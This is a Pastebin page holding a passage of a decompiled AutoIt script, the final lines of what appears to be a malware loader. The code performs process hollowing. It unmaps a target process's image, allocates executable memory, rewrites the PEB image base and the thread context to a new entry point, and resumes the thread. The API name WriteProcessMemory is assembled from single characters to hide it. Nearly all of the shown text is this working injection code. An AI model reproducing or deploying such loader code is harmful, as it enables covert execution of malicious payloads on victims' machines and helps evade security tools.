  496. LOCAL $2W=DLLSTRUCTCREATE("byte InheritedAddressSpace;"&"byte ReadImageFileExecOptions;"&"byte BeingDebugged;"&"byte Spare;"&"ptr Mutant;"&"ptr ImageBaseAddress;"&"ptr LoaderData;"&"ptr ProcessParameters;"&"ptr SubSystemData;"&"ptr ProcessHeap;"&"ptr FastPebLock;"&"ptr FastPebLockRoutine;"&"ptr FastPebUnlockRoutine;"&"dword EnvironmentUpdateCount;"&"ptr KernelCallbackTable;"&"ptr EventLogSection;"&"ptr EventLog;"&"ptr FreeList;"&"dword TlsExpansionCounter;"&"ptr TlsBitmap;"&"dword TlsBitmapBits[2];"&"ptr ReadOnlySharedMemoryBase;"&"ptr ReadOnlySharedMemoryHeap;"&"ptr ReadOnlyStaticServerData;"&"ptr AnsiCodePageData;"&"ptr OemCodePageData;"&"ptr UnicodeCaseTableData;"&"dword NumberOfProcessors;"&"dword NtGlobalFlag;"&"byte Spare2[4];"&"int64 CriticalSectionTimeout;"&"dword HeapSegmentReserve;"&"dword HeapSegmentCommit;"&"dword HeapDeCommitTotalFreeThreshold;"&"dword HeapDeCommitFreeBlockThreshold;"&"dword NumberOfHeaps;"&"dword MaximumNumberOfHeaps;"&"ptr ProcessHeaps;"&"ptr GdiSharedHandleTable;"&"ptr ProcessStarterHelper;"&"ptr GdiDCAttributeList;"&"ptr LoaderLock;"&"dword OSMajorVersion;"&"dword OSMinorVersion;"&"dword OSBuildNumber;"&"dword OSPlatformId;"&"dword ImageSubSystem;"&"dword ImageSubSystemMajorVersion;"&"dword ImageSubSystemMinorVersion;"&"dword GdiHandleBuffer[34];"&"dword PostProcessInitRoutine;"&"dword TlsExpansionBitmap;"&"byte TlsExpansionBitmapBits[128];"&"dword SessionId")
  497. $1W=DLLCALL("kernel32.dll","bool","ReadProcessMemory","ptr",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
  498. IF @ERROR OR NOT $1W[0]THEN
  499. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  500. RETURN SETERROR(8,0,0)
  501. ENDIF
  502. DLLSTRUCTSETDATA($2W,"ImageBaseAddress",$2L)
  503. $1W=DLLCALL("kernel32.dll","bool",_6H(),"handle",$1X,"ptr",$22,"ptr",DLLSTRUCTGETPTR($2W),"dword_ptr",DLLSTRUCTGETSIZE($2W),"dword_ptr*",0)
  504. IF @ERROR OR NOT $1W[0]THEN
  505. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  506. RETURN SETERROR(9,0,0)
  507. ENDIF
  508. SWITCH $1Z
  509. CASE 1
  510. DLLSTRUCTSETDATA($20,"Eax",$2L+$2C)
  511. CASE 2
  512. DLLSTRUCTSETDATA($20,"Rcx",$2L+$2C)
  513. CASE 3
  514. ENDSWITCH
  515. $1W=DLLCALL("kernel32.dll","bool","SetThreadContext","handle",$1Y,"ptr",DLLSTRUCTGETPTR($20))
  516. IF @ERROR OR NOT $1W[0]THEN
  517. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  518. RETURN SETERROR(10,0,0)
  519. ENDIF
  520. $1W=DLLCALL("kernel32.dll","dword","ResumeThread","handle",$1Y)
  521. IF @ERROR OR $1W[0]=-1 THEN
  522. DLLCALL("kernel32.dll","bool","TerminateProcess","handle",$1X,"dword",0)
  523. RETURN SETERROR(11,0,0)
  524. ENDIF
  525. DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1X)
  526. DLLCALL("kernel32.dll","bool","CloseHandle","handle",$1Y)
  527. RETURN DLLSTRUCTGETDATA($1V,"ProcessId")
  528. ENDFUNC
  529. FUNC _6H()
  530. LOCAL $2X[18]=["W","r","i","t","e","P","r","o","c","e","s","s","M","e","m","o","r","y"],$2Y
  531. FOR $2Z IN $2X
  532. $2Y&=$2Z
  533. NEXT
  534. RETURN $2Y
  535. ENDFUNC
  536. FUNC _6I($2N,$30,$31,$32,$33)
  537. LOCAL $34=$31-$32
  538. LOCAL $35=DLLSTRUCTGETSIZE($30)
  539. LOCAL $36=DLLSTRUCTGETPTR($30)
  540. LOCAL $37,$38
  541. LOCAL $2S,$39,$3A
  542. LOCAL $3B,$3C,$3D
  543. LOCAL $12=3+7*$33
  544. WHILE $38<$35
  545. $37=DLLSTRUCTCREATE("dword VirtualAddress; dword SizeOfBlock",$36+$38)
  546. $2S=DLLSTRUCTGETDATA($37,"VirtualAddress")
  547. $39=DLLSTRUCTGETDATA($37,"SizeOfBlock")
  548. $3A=($39-8)/2
  549. $3B=DLLSTRUCTCREATE("word["&$3A&"]",DLLSTRUCTGETPTR($37)+8)
  550. FOR $2V=1 TO $3A
  551. $3C=DLLSTRUCTGETDATA($3B,1,$2V)
  552. IF BITSHIFT($3C,12)=$12 THEN
  553. $3D=DLLSTRUCTCREATE("ptr",$2N+$2S+BITAND($3C,4095))
  554. DLLSTRUCTSETDATA($3D,1,DLLSTRUCTGETDATA($3D,1)+$34)
  555. ENDIF
  556. NEXT
  557. $38+=$39
  558. WEND
  559. RETURN 1
  560. ENDFUNC
  561. FUNC _6J($1X,$3E,$35)
  562. LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",4096,"dword",64)
  563. IF @ERROR OR NOT $1W[0]THEN
  564. $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",$3E,"dword_ptr",$35,"dword",12288,"dword",64)
  565. IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
  566. ENDIF
  567. RETURN $1W[0]
  568. ENDFUNC
  569. FUNC _6K($1X,$35)
  570. LOCAL $1W=DLLCALL("kernel32.dll","ptr","VirtualAllocEx","handle",$1X,"ptr",0,"dword_ptr",$35,"dword",12288,"dword",64)
  571. IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
  572. RETURN $1W[0]
  573. ENDFUNC
  574. FUNC _6L($1X,$3E)
  575. DLLCALL("ntdll.dll","int","NtUnmapViewOfSection","ptr",$1X,"ptr",$3E)
  576. IF @ERROR THEN RETURN SETERROR(1,0,0)
  577. RETURN 1
  578. ENDFUNC
  579. FUNC _6M($1X)
  580. LOCAL $1W=DLLCALL("kernel32.dll","bool","IsWow64Process","handle",$1X,"bool*",0)
  581. IF @ERROR OR NOT $1W[0]THEN RETURN SETERROR(1,0,0)
  582. RETURN $1W[2]
  583. ENDFUNC
  584. ; DeTokenise by myAut2Exe >The Open Source AutoIT/AutoHotKey script decompiler< - dmod 2.12 build(269)
  585.  
  586.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!